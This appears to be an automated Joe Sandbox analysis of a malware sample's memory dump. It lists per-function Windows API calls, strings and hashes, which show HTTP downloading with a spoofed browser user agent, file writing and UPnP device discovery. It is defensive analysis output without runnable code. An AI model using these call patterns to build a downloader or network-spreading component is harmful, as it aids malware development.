                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                    • String ID: %x%X$0
                                                                    • API String ID: 716646876-225668902
                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68
                                                                    Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 679 40dbc0-40dc5b memset InternetCrackUrlA InternetOpenA 680 40dc61-40dc94 InternetConnectA 679->680 681 40ddd7-40dde0 679->681 682 40ddca-40ddd1 InternetCloseHandle 680->682 683 40dc9a-40dcca HttpOpenRequestA 680->683 682->681 684 40dcd0-40dce7 HttpSendRequestA 683->684 685 40ddbd-40ddc4 InternetCloseHandle 683->685 686 40ddb0-40ddb7 InternetCloseHandle 684->686 687 40dced-40dcf1 684->687 685->682 686->685 688 40dda6 687->688 689 40dcf7 687->689 688->686 690 40dd01-40dd08 689->690 691 40dd99-40dda4 690->691 692 40dd0e-40dd30 InternetReadFile 690->692 691->686 693 40dd32-40dd39 692->693 694 40dd3b 692->694 693->694 695 40dd3d-40dd94 call 409fe0 memcpy 693->695 694->691 695->690
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040DBE8
                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                    • String ID: <$GET
                                                                    • API String ID: 1205665004-427699995
                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                    Function 0040E7C0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                    • String ID: .Mw
                                                                    • API String ID: 3902698870-2453323595
                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                    Function 0040B2C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                    • String ID: Vz@$.Mw
                                                                    • API String ID: 439099756-60430008
                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                    Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 3862671961-0
                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                    Function 00405BC0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                    • String ID: .Mw
                                                                    • API String ID: 3956458805-2453323595
                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                    Function 00406060 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 1457358591-2453323595
                                                                    • Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                    • Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 671207744-0
                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                    Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Sleeprecvfrom
                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                    • API String ID: 668330359-3973262388
                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                    Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                    • API String ID: 2743515581-2960703779
                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                    Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                    Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                    • Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                    Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                    Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
